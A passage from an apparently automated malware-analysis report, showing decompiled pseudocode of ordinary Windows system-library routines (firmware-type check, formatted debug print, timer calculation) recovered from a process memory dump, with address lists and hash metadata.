                                                                                  							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                                  							_t106 = _t106 + 1;
                                                                                  						}
                                                                                  						_t88 = E00F2500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                                  						_t119 = _t119 + 0x1c;
                                                                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                                  						if(_t88 < 0) {
                                                                                  							goto L29;
                                                                                  						}
                                                                                  						_t101 = _t118 - 0x3c;
                                                                                  						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                                  						goto L21;
                                                                                  					}
                                                                                  					_t67 = 0xc0000017;
                                                                                  					goto L28;
                                                                                  				}
                                                                                  				_push(0);
                                                                                  				_push(0x20);
                                                                                  				_push(_t118 - 0x60);
                                                                                  				_push(0x5a);
                                                                                  				_t94 = E00EE9860();
                                                                                  				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                                  				if(_t94 < 0) {
                                                                                  					goto L29;
                                                                                  				}
                                                                                  				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                                  					_t101 = L"Legacy";
                                                                                  					_push(6);
                                                                                  				} else {
                                                                                  					_t101 = L"UEFI";
                                                                                  					_push(4);
                                                                                  				}
                                                                                  				_pop(_t65);
                                                                                  				goto L21;
                                                                                  			}






















                                                                                  0x00f251be
                                                                                  0x00f251c3
                                                                                  0x00f251c8
                                                                                  0x00f251cd
                                                                                  0x00f251d0
                                                                                  0x00f251d3
                                                                                  0x00f251d8
                                                                                  0x00f251db
                                                                                  0x00f251de
                                                                                  0x00f251e0
                                                                                  0x00f251e3
                                                                                  0x00f251e6
                                                                                  0x00f251e8
                                                                                  0x00f25342
                                                                                  0x00f25351
                                                                                  0x00f25356
                                                                                  0x00f2535a
                                                                                  0x00f25360
                                                                                  0x00f25363
                                                                                  0x00f25366
                                                                                  0x00f25369
                                                                                  0x00f25369
                                                                                  0x00f2536b
                                                                                  0x00f2536b
                                                                                  0x00f25370
                                                                                  0x00f253a3
                                                                                  0x00f253a4
                                                                                  0x00f253a6
                                                                                  0x00f253ab
                                                                                  0x00f253ab
                                                                                  0x00f253ae
                                                                                  0x00f253ae
                                                                                  0x00f253b5
                                                                                  0x00f253bf
                                                                                  0x00f253bf
                                                                                  0x00f25375
                                                                                  0x00f25396
                                                                                  0x00f253a0
                                                                                  0x00f253a0
                                                                                  0x00000000
                                                                                  0x00f25396
                                                                                  0x00f25377
                                                                                  0x00f25379
                                                                                  0x00f2537f
                                                                                  0x00f2538c
                                                                                  0x00f25390
                                                                                  0x00000000
                                                                                  0x00f25390
                                                                                  0x00f251ee
                                                                                  0x00f251f1
                                                                                  0x00f25301
                                                                                  0x00f25310
                                                                                  0x00f25315
                                                                                  0x00f25318
                                                                                  0x00f2531b
                                                                                  0x00f25320
                                                                                  0x00f2532e
                                                                                  0x00f25331
                                                                                  0x00000000
                                                                                  0x00f25331
                                                                                  0x00f25328
                                                                                  0x00f25329
                                                                                  0x00000000
                                                                                  0x00f25329
                                                                                  0x00f251fa
                                                                                  0x00f25235
                                                                                  0x00f25236
                                                                                  0x00f25239
                                                                                  0x00f2523f
                                                                                  0x00f25240
                                                                                  0x00f25241
                                                                                  0x00f25242
                                                                                  0x00f25246
                                                                                  0x00f25247
                                                                                  0x00f2524e
                                                                                  0x00f25251
                                                                                  0x00f25267
                                                                                  0x00f25269
                                                                                  0x00f2526e
                                                                                  0x00f2527d
                                                                                  0x00f2527e
                                                                                  0x00f25281
                                                                                  0x00f25282
                                                                                  0x00f25287
                                                                                  0x00f25288
                                                                                  0x00f2528a
                                                                                  0x00f2528f
                                                                                  0x00f25294
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f2529a
                                                                                  0x00f2529c
                                                                                  0x00f2529e
                                                                                  0x00f2529e
                                                                                  0x00f252a4
                                                                                  0x00f252b0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f252ba
                                                                                  0x00f252bc
                                                                                  0x00f252bc
                                                                                  0x00f252d4
                                                                                  0x00f252d9
                                                                                  0x00f252dc
                                                                                  0x00f252e1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f252e7
                                                                                  0x00f252f4
                                                                                  0x00000000
                                                                                  0x00f252f4
                                                                                  0x00f25270
                                                                                  0x00000000
                                                                                  0x00f25270
                                                                                  0x00f251fc
                                                                                  0x00f251fd
                                                                                  0x00f25202
                                                                                  0x00f25203
                                                                                  0x00f25205
                                                                                  0x00f2520a
                                                                                  0x00f2520f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f2521b
                                                                                  0x00f25226
                                                                                  0x00f2522b
                                                                                  0x00f2521d
                                                                                  0x00f2521d
                                                                                  0x00f25222
                                                                                  0x00f25222
                                                                                  0x00f2522d
                                                                                  0x00000000

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Legacy$UEFI
                                                                                  • API String ID: 2994545307-634100481
                                                                                  • Opcode ID: 96694cc374d6edb7779e10c405dc117370d681903f84ad46ecfd970351169030
                                                                                  • Instruction ID: 8b38b23cd8aa7a3b82332c77b9b40a3e20ed343fb25c6f05c7d36d3a29ca6730
                                                                                  • Opcode Fuzzy Hash: 96694cc374d6edb7779e10c405dc117370d681903f84ad46ecfd970351169030
                                                                                  • Instruction Fuzzy Hash: EC517E71E00B289FDB24DFA8D941BADBBF9FB48B40F24502DE549EB291D6719D00DB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 78%
                                                                                  			E00EAB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                                  				signed int _t65;
                                                                                  				signed short _t69;
                                                                                  				intOrPtr _t70;
                                                                                  				signed short _t85;
                                                                                  				void* _t86;
                                                                                  				signed short _t89;
                                                                                  				signed short _t91;
                                                                                  				intOrPtr _t92;
                                                                                  				intOrPtr _t97;
                                                                                  				intOrPtr* _t98;
                                                                                  				signed short _t99;
                                                                                  				signed short _t101;
                                                                                  				void* _t102;
                                                                                  				char* _t103;
                                                                                  				signed short _t104;
                                                                                  				intOrPtr* _t110;
                                                                                  				void* _t111;
                                                                                  				void* _t114;
                                                                                  				intOrPtr* _t115;
                                                                                  
                                                                                  				_t109 = __esi;
                                                                                  				_t108 = __edi;
                                                                                  				_t106 = __edx;
                                                                                  				_t95 = __ebx;
                                                                                  				_push(0x90);
                                                                                  				_push(0xf7f7a8);
                                                                                  				E00EFD0E8(__ebx, __edi, __esi);
                                                                                  				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                                  				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                                  				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                                  				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                                  				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                                  				if(__edx == 0xffffffff) {
                                                                                  					L6:
                                                                                  					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                                  					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                                  					__eflags = _t65 & 0x00000002;
                                                                                  					if((_t65 & 0x00000002) != 0) {
                                                                                  						L3:
                                                                                  						L4:
                                                                                  						return E00EFD130(_t95, _t108, _t109);
                                                                                  					}
                                                                                  					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                                  					_t108 = 0;
                                                                                  					_t109 = 0;
                                                                                  					_t95 = 0;
                                                                                  					__eflags = 0;
                                                                                  					while(1) {
                                                                                  						__eflags = _t95 - 0x200;
                                                                                  						if(_t95 >= 0x200) {
                                                                                  							break;
                                                                                  						}
                                                                                  						E00EED000(0x80);
                                                                                  						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                                  						_t108 = _t115;
                                                                                  						_t95 = _t95 - 0xffffff80;
                                                                                  						_t17 = _t114 - 4;
                                                                                  						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                                  						__eflags =  *_t17;
                                                                                  						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                  						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                  						_t102 = _t110 + 1;
                                                                                  						do {
                                                                                  							_t85 =  *_t110;
                                                                                  							_t110 = _t110 + 1;
                                                                                  							__eflags = _t85;
                                                                                  						} while (_t85 != 0);
                                                                                  						_t111 = _t110 - _t102;
                                                                                  						_t21 = _t95 - 1; // -129
                                                                                  						_t86 = _t21;
                                                                                  						__eflags = _t111 - _t86;
                                                                                  						if(_t111 > _t86) {
                                                                                  							_t111 = _t86;
                                                                                  						}
                                                                                  						E00EEF3E0(_t108, _t106, _t111);
                                                                                  						_t115 = _t115 + 0xc;
                                                                                  						_t103 = _t111 + _t108;
                                                                                  						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                                  						_t89 = _t95 - _t111;
                                                                                  						__eflags = _t89;
                                                                                  						_push(0);
                                                                                  						if(_t89 == 0) {
                                                                                  							L15:
                                                                                  							_t109 = 0xc000000d;
                                                                                  							goto L16;
                                                                                  						} else {
                                                                                  							__eflags = _t89 - 0x7fffffff;
                                                                                  							if(_t89 <= 0x7fffffff) {
                                                                                  								L16:
                                                                                  								 *(_t114 - 0x94) = _t109;
                                                                                  								__eflags = _t109;
                                                                                  								if(_t109 < 0) {
                                                                                  									__eflags = _t89;
                                                                                  									if(_t89 != 0) {
                                                                                  										 *_t103 = 0;
                                                                                  									}
                                                                                  									L26:
                                                                                  									 *(_t114 - 0xa0) = _t109;
                                                                                  									 *(_t114 - 4) = 0xfffffffe;
                                                                                  									__eflags = _t109;
                                                                                  									if(_t109 >= 0) {
                                                                                  										L31:
                                                                                  										_t98 = _t108;
                                                                                  										_t39 = _t98 + 1; // 0x1
                                                                                  										_t106 = _t39;
                                                                                  										do {
                                                                                  											_t69 =  *_t98;
                                                                                  											_t98 = _t98 + 1;
                                                                                  											__eflags = _t69;
                                                                                  										} while (_t69 != 0);
                                                                                  										_t99 = _t98 - _t106;
                                                                                  										__eflags = _t99;
                                                                                  										L34:
                                                                                  										_t70 =  *[fs:0x30];
                                                                                  										__eflags =  *((char*)(_t70 + 2));
                                                                                  										if( *((char*)(_t70 + 2)) != 0) {
                                                                                  											L40:
                                                                                  											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                                  											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                                  											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                                  											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                                  											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                                  											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                                  											 *(_t114 - 4) = 1;
                                                                                  											_push(_t114 - 0x74);
                                                                                  											L00EFDEF0(_t99, _t106);
                                                                                  											 *(_t114 - 4) = 0xfffffffe;
                                                                                  											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                  											goto L3;
                                                                                  										}
                                                                                  										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                                  										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                                  											goto L40;
                                                                                  										}
                                                                                  										_push( *((intOrPtr*)(_t114 + 8)));
                                                                                  										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                                  										_push(_t99 & 0x0000ffff);
                                                                                  										_push(_t108);
                                                                                  										_push(1);
                                                                                  										_t101 = E00EEB280();
                                                                                  										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                                  										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                                  											__eflags = _t101 - 0x80000003;
                                                                                  											if(_t101 == 0x80000003) {
                                                                                  												E00EEB7E0(1);
                                                                                  												_t101 = 0;
                                                                                  												__eflags = 0;
                                                                                  											}
                                                                                  										}
                                                                                  										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                  										goto L4;
                                                                                  									}
                                                                                  									__eflags = _t109 - 0x80000005;
                                                                                  									if(_t109 == 0x80000005) {
                                                                                  										continue;
                                                                                  									}
                                                                                  									break;
                                                                                  								}
                                                                                  								 *(_t114 - 0x90) = 0;
                                                                                  								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                                  								_t91 = E00EEE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                                  								_t115 = _t115 + 0x10;
                                                                                  								_t104 = _t91;
                                                                                  								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                                  								__eflags = _t104;
                                                                                  								if(_t104 < 0) {
                                                                                  									L21:
                                                                                  									_t109 = 0x80000005;
                                                                                  									 *(_t114 - 0x90) = 0x80000005;
                                                                                  									L22:
                                                                                  									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                                  									L23:
                                                                                  									 *(_t114 - 0x94) = _t109;
                                                                                  									goto L26;
                                                                                  								}
                                                                                  								__eflags = _t104 - _t92;
                                                                                  								if(__eflags > 0) {
                                                                                  									goto L21;
                                                                                  								}
                                                                                  								if(__eflags == 0) {
                                                                                  									goto L22;
                                                                                  								}
                                                                                  								goto L23;
                                                                                  							}
                                                                                  							goto L15;
                                                                                  						}
                                                                                  					}
                                                                                  					__eflags = _t109;
                                                                                  					if(_t109 >= 0) {
                                                                                  						goto L31;
                                                                                  					}
                                                                                  					__eflags = _t109 - 0x80000005;
                                                                                  					if(_t109 != 0x80000005) {
                                                                                  						goto L31;
                                                                                  					}
                                                                                  					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                                  					_t38 = _t95 - 1; // -129
                                                                                  					_t99 = _t38;
                                                                                  					goto L34;
                                                                                  				}
                                                                                  				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                  					__eflags = __edx - 0x65;
                                                                                  					if(__edx != 0x65) {
                                                                                  						goto L2;
                                                                                  					}
                                                                                  					goto L6;
                                                                                  				}
                                                                                  				L2:
                                                                                  				_push( *((intOrPtr*)(_t114 + 8)));
                                                                                  				_push(_t106);
                                                                                  				if(E00EEA890() != 0) {
                                                                                  					goto L6;
                                                                                  				}
                                                                                  				goto L3;
                                                                                  			}






















                                                                                  0x00eab171
                                                                                  0x00eab171
                                                                                  0x00eab171
                                                                                  0x00eab171
                                                                                  0x00eab171
                                                                                  0x00eab176
                                                                                  0x00eab17b
                                                                                  0x00eab180
                                                                                  0x00eab186
                                                                                  0x00eab18f
                                                                                  0x00eab198
                                                                                  0x00eab1a4
                                                                                  0x00eab1aa
                                                                                  0x00f04802
                                                                                  0x00f04802
                                                                                  0x00f04805
                                                                                  0x00f0480c
                                                                                  0x00f0480e
                                                                                  0x00eab1d1
                                                                                  0x00eab1d3
                                                                                  0x00eab1de
                                                                                  0x00eab1de
                                                                                  0x00f04817
                                                                                  0x00f0481e
                                                                                  0x00f04820
                                                                                  0x00f04822
                                                                                  0x00f04822
                                                                                  0x00f04824
                                                                                  0x00f04824
                                                                                  0x00f0482a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f04835
                                                                                  0x00f0483a
                                                                                  0x00f0483d
                                                                                  0x00f0483f
                                                                                  0x00f04842
                                                                                  0x00f04842
                                                                                  0x00f04842
                                                                                  0x00f04846
                                                                                  0x00f0484c
                                                                                  0x00f0484e
                                                                                  0x00f04851
                                                                                  0x00f04851
                                                                                  0x00f04853
                                                                                  0x00f04854
                                                                                  0x00f04854
                                                                                  0x00f04858
                                                                                  0x00f0485a
                                                                                  0x00f0485a
                                                                                  0x00f0485d
                                                                                  0x00f0485f
                                                                                  0x00f04861
                                                                                  0x00f04861
                                                                                  0x00f04866
                                                                                  0x00f0486b
                                                                                  0x00f0486e
                                                                                  0x00f04871
                                                                                  0x00f04876
                                                                                  0x00f04876
                                                                                  0x00f04878
                                                                                  0x00f0487b
                                                                                  0x00f04884
                                                                                  0x00f04884
                                                                                  0x00000000
                                                                                  0x00f0487d
                                                                                  0x00f0487d
                                                                                  0x00f04882
                                                                                  0x00f04889
                                                                                  0x00f04889
                                                                                  0x00f0488f
                                                                                  0x00f04891
                                                                                  0x00f048e0
                                                                                  0x00f048e2
                                                                                  0x00f048e4
                                                                                  0x00f048e4
                                                                                  0x00f048e7
                                                                                  0x00f048e7
                                                                                  0x00f048ed
                                                                                  0x00f048f4
                                                                                  0x00f048f6
                                                                                  0x00f04951
                                                                                  0x00f04951
                                                                                  0x00f04953
                                                                                  0x00f04953
                                                                                  0x00f04956
                                                                                  0x00f04956
                                                                                  0x00f04958
                                                                                  0x00f04959
                                                                                  0x00f04959
                                                                                  0x00f0495d
                                                                                  0x00f0495d
                                                                                  0x00f0495f
                                                                                  0x00f0495f
                                                                                  0x00f04965
                                                                                  0x00f04969
                                                                                  0x00f049ba
                                                                                  0x00f049ba
                                                                                  0x00f049c1
                                                                                  0x00f049c5
                                                                                  0x00f049cc
                                                                                  0x00f049d4
                                                                                  0x00f049d7
                                                                                  0x00f049da
                                                                                  0x00f049e4
                                                                                  0x00f049e5
                                                                                  0x00f049f3
                                                                                  0x00f04a02
                                                                                  0x00000000
                                                                                  0x00f04a02
                                                                                  0x00f04972
                                                                                  0x00f04974
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f04976
                                                                                  0x00f04979
                                                                                  0x00f04982
                                                                                  0x00f04983
                                                                                  0x00f04984
                                                                                  0x00f0498b
                                                                                  0x00f0498d
                                                                                  0x00f04991
                                                                                  0x00f04993
                                                                                  0x00f04999
                                                                                  0x00f0499d
                                                                                  0x00f049a2
                                                                                  0x00f049a2
                                                                                  0x00f049a2
                                                                                  0x00f04999
                                                                                  0x00f049ac
                                                                                  0x00000000
                                                                                  0x00f049b3
                                                                                  0x00f048f8
                                                                                  0x00f048fe
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f048fe
                                                                                  0x00f04895
                                                                                  0x00f0489c
                                                                                  0x00f048ad
                                                                                  0x00f048b2
                                                                                  0x00f048b5
                                                                                  0x00f048b7
                                                                                  0x00f048ba
                                                                                  0x00f048bc
                                                                                  0x00f048c6
                                                                                  0x00f048c6
                                                                                  0x00f048cb
                                                                                  0x00f048d1
                                                                                  0x00f048d4
                                                                                  0x00f048d8
                                                                                  0x00f048d8
                                                                                  0x00000000
                                                                                  0x00f048d8
                                                                                  0x00f048be
                                                                                  0x00f048c0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f048c2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f048c4
                                                                                  0x00000000
                                                                                  0x00f04882
                                                                                  0x00f0487b
                                                                                  0x00f04904
                                                                                  0x00f04906
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f04908
                                                                                  0x00f0490e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f04910
                                                                                  0x00f04917
                                                                                  0x00f04917
                                                                                  0x00000000
                                                                                  0x00f04917
                                                                                  0x00eab1ba
                                                                                  0x00f047f9
                                                                                  0x00f047fc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f047fc
                                                                                  0x00eab1c0
                                                                                  0x00eab1c0
                                                                                  0x00eab1c3
                                                                                  0x00eab1cb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: _vswprintf_s
                                                                                  • String ID:
                                                                                  • API String ID: 677850445-0
                                                                                  • Opcode ID: 932fc136000af3f5405e9f4736d597217671e039f5d77805573203b67937e062
                                                                                  • Instruction ID: 1b1db884a9572258c0ae00d71820b21e46261c486fecaa61ef718a095f51c168
                                                                                  • Opcode Fuzzy Hash: 932fc136000af3f5405e9f4736d597217671e039f5d77805573203b67937e062
                                                                                  • Instruction Fuzzy Hash: AD51C3B1D002598EDF30CF648845BAEBBF1BF05720F1081ADEA59AB2C2D7706D45BB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 76%
                                                                                  			E00ECB944(signed int* __ecx, char __edx) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v16;
                                                                                  				signed int _v20;
                                                                                  				char _v28;
                                                                                  				signed int _v32;
                                                                                  				char _v36;
                                                                                  				signed int _v40;
                                                                                  				intOrPtr _v44;
                                                                                  				signed int* _v48;
                                                                                  				signed int _v52;
                                                                                  				signed int _v56;
                                                                                  				intOrPtr _v60;
                                                                                  				intOrPtr _v64;
                                                                                  				intOrPtr _v68;
                                                                                  				intOrPtr _v72;
                                                                                  				intOrPtr _v76;
                                                                                  				char _v77;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				intOrPtr* _t65;
                                                                                  				intOrPtr _t67;
                                                                                  				intOrPtr _t68;
                                                                                  				char* _t73;
                                                                                  				intOrPtr _t77;
                                                                                  				intOrPtr _t78;
                                                                                  				signed int _t82;
                                                                                  				intOrPtr _t83;
                                                                                  				void* _t87;
                                                                                  				char _t88;
                                                                                  				intOrPtr* _t89;
                                                                                  				intOrPtr _t91;
                                                                                  				void* _t97;
                                                                                  				intOrPtr _t100;
                                                                                  				void* _t102;
                                                                                  				void* _t107;
                                                                                  				signed int _t108;
                                                                                  				intOrPtr* _t112;
                                                                                  				void* _t113;
                                                                                  				intOrPtr* _t114;
                                                                                  				intOrPtr _t115;
                                                                                  				intOrPtr _t116;
                                                                                  				intOrPtr _t117;
                                                                                  				signed int _t118;
                                                                                  				void* _t130;
                                                                                  
                                                                                  				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                                  				_v8 =  *0xf9d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                                  				_t112 = __ecx;
                                                                                  				_v77 = __edx;
                                                                                  				_v48 = __ecx;
                                                                                  				_v28 = 0;
                                                                                  				_t5 = _t112 + 0xc; // 0x575651ff
                                                                                  				_t105 =  *_t5;
                                                                                  				_v20 = 0;
                                                                                  				_v16 = 0;
                                                                                  				if(_t105 == 0) {
                                                                                  					_t50 = _t112 + 4; // 0x5de58b5b
                                                                                  					_t60 =  *__ecx |  *_t50;
                                                                                  					if(( *__ecx |  *_t50) != 0) {
                                                                                  						 *__ecx = 0;
                                                                                  						__ecx[1] = 0;
                                                                                  						if(E00EC7D50() != 0) {
                                                                                  							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                  						} else {
                                                                                  							_t65 = 0x7ffe0386;
                                                                                  						}
                                                                                  						if( *_t65 != 0) {
                                                                                  							E00F78CD6(_t112);
                                                                                  						}
                                                                                  						_push(0);
                                                                                  						_t52 = _t112 + 0x10; // 0x778df98b
                                                                                  						_push( *_t52);
                                                                                  						_t60 = E00EE9E20();
                                                                                  					}
                                                                                  					L20:
                                                                                  					_pop(_t107);
                                                                                  					_pop(_t113);
                                                                                  					_pop(_t87);
                                                                                  					return E00EEB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                                  				}
                                                                                  				_t8 = _t112 + 8; // 0x8b000cc2
                                                                                  				_t67 =  *_t8;
                                                                                  				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                                  				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                                  				_t108 =  *(_t67 + 0x14);
                                                                                  				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                                  				_t105 = 0x2710;
                                                                                  				asm("sbb eax, edi");
                                                                                  				_v44 = _t88;
                                                                                  				_v52 = _t108;
                                                                                  				_t60 = E00EECE00(_t97, _t68, 0x2710, 0);
                                                                                  				_v56 = _t60;
                                                                                  				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                                  					L3:
                                                                                  					 *(_t112 + 0x44) = _t60;
                                                                                  					_t105 = _t60 * 0x2710 >> 0x20;
                                                                                  					 *_t112 = _t88;
                                                                                  					 *(_t112 + 4) = _t108;
                                                                                  					_v20 = _t60 * 0x2710;
                                                                                  					_v16 = _t60 * 0x2710 >> 0x20;
                                                                                  					if(_v77 != 0) {
                                                                                  						L16:
                                                                                  						_v36 = _t88;
                                                                                  						_v32 = _t108;
                                                                                  						if(E00EC7D50() != 0) {
                                                                                  							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                  						} else {
                                                                                  							_t73 = 0x7ffe0386;
                                                                                  						}
                                                                                  						if( *_t73 != 0) {
                                                                                  							_t105 = _v40;
                                                                                  							E00F78F6A(_t112, _v40, _t88, _t108);
                                                                                  						}
                                                                                  						_push( &_v28);
                                                                                  						_push(0);
                                                                                  						_push( &_v36);
                                                                                  						_t48 = _t112 + 0x10; // 0x778df98b
                                                                                  						_push( *_t48);
                                                                                  						_t60 = E00EEAF60();
                                                                                  						goto L20;
                                                                                  					} else {
                                                                                  						_t89 = 0x7ffe03b0;
                                                                                  						do {
                                                                                  							_t114 = 0x7ffe0010;
                                                                                  							do {
                                                                                  								_t77 =  *0xf98628; // 0x0
                                                                                  								_v68 = _t77;
                                                                                  								_t78 =  *0xf9862c; // 0x0
                                                                                  								_v64 = _t78;
                                                                                  								_v72 =  *_t89;
                                                                                  								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                                  								while(1) {
                                                                                  									_t105 =  *0x7ffe000c;
                                                                                  									_t100 =  *0x7ffe0008;
                                                                                  									if(_t105 ==  *_t114) {
                                                                                  										goto L8;
                                                                                  									}
                                                                                  									asm("pause");
                                                                                  								}
                                                                                  								L8:
                                                                                  								_t89 = 0x7ffe03b0;
                                                                                  								_t115 =  *0x7ffe03b0;
                                                                                  								_t82 =  *0x7FFE03B4;
                                                                                  								_v60 = _t115;
                                                                                  								_t114 = 0x7ffe0010;
                                                                                  								_v56 = _t82;
                                                                                  							} while (_v72 != _t115 || _v76 != _t82);
                                                                                  							_t83 =  *0xf98628; // 0x0
                                                                                  							_t116 =  *0xf9862c; // 0x0
                                                                                  							_v76 = _t116;
                                                                                  							_t117 = _v68;
                                                                                  						} while (_t117 != _t83 || _v64 != _v76);
                                                                                  						asm("sbb edx, [esp+0x24]");
                                                                                  						_t102 = _t100 - _v60 - _t117;
                                                                                  						_t112 = _v48;
                                                                                  						_t91 = _v44;
                                                                                  						asm("sbb edx, eax");
                                                                                  						_t130 = _t105 - _v52;
                                                                                  						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                                  							_t88 = _t102 - _t91;
                                                                                  							asm("sbb edx, edi");
                                                                                  							_t108 = _t105;
                                                                                  						} else {
                                                                                  							_t88 = 0;
                                                                                  							_t108 = 0;
                                                                                  						}
                                                                                  						goto L16;
                                                                                  					}
                                                                                  				} else {
                                                                                  					if( *(_t112 + 0x44) == _t60) {
                                                                                  						goto L20;
                                                                                  					}
                                                                                  					goto L3;
                                                                                  				}
                                                                                  			}
















































                                                                                  0x00ecb94c
                                                                                  0x00ecb956
                                                                                  0x00ecb95c
                                                                                  0x00ecb95e
                                                                                  0x00ecb964
                                                                                  0x00ecb969
                                                                                  0x00ecb96d
                                                                                  0x00ecb96d
                                                                                  0x00ecb970
                                                                                  0x00ecb974
                                                                                  0x00ecb97a
                                                                                  0x00ecbadf
                                                                                  0x00ecbadf
                                                                                  0x00ecbae2
                                                                                  0x00ecbae4
                                                                                  0x00ecbae6
                                                                                  0x00ecbaf0
                                                                                  0x00f12cb8
                                                                                  0x00ecbaf6
                                                                                  0x00ecbaf6
                                                                                  0x00ecbaf6
                                                                                  0x00ecbafd
                                                                                  0x00ecbb1f
                                                                                  0x00ecbb1f
                                                                                  0x00ecbaff
                                                                                  0x00ecbb00
                                                                                  0x00ecbb00
                                                                                  0x00ecbb03
                                                                                  0x00ecbb03
                                                                                  0x00ecbacb
                                                                                  0x00ecbacf
                                                                                  0x00ecbad0
                                                                                  0x00ecbad1
                                                                                  0x00ecbadc
                                                                                  0x00ecbadc
                                                                                  0x00ecb980
                                                                                  0x00ecb980
                                                                                  0x00ecb988
                                                                                  0x00ecb98b
                                                                                  0x00ecb98d
                                                                                  0x00ecb990
                                                                                  0x00ecb993
                                                                                  0x00ecb999
                                                                                  0x00ecb99b
                                                                                  0x00ecb9a1
                                                                                  0x00ecb9a5
                                                                                  0x00ecb9aa
                                                                                  0x00ecb9b0
                                                                                  0x00ecb9bb
                                                                                  0x00ecb9c0
                                                                                  0x00ecb9c3
                                                                                  0x00ecb9ca
                                                                                  0x00ecb9cc
                                                                                  0x00ecb9cf
                                                                                  0x00ecb9d3
                                                                                  0x00ecb9d7
                                                                                  0x00ecba94
                                                                                  0x00ecba94
                                                                                  0x00ecba98
                                                                                  0x00ecbaa3
                                                                                  0x00f12ccb
                                                                                  0x00ecbaa9
                                                                                  0x00ecbaa9
                                                                                  0x00ecbaa9
